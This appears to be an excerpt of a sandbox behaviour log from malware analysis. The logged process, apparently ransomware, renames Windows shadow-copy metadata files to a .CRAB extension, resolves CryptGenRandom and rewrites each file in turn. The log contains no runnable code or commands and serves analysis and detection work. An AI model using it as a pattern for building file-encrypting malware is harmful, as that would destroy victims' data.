File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3296 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, size = 3296 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3632 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, size = 3632 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3184 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, size = 3184 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2944 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, size = 2944 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 840 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, size = 848 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2616 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, size = 2624 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3440 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, size = 3440 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3416 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, size = 3424 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2784 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, size = 2784 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3360 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, size = 3360 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 944 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, size = 944 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3408 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, size = 3408 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3112 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, size = 3120 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3512 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, size = 3520 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3608 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, size = 3616 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
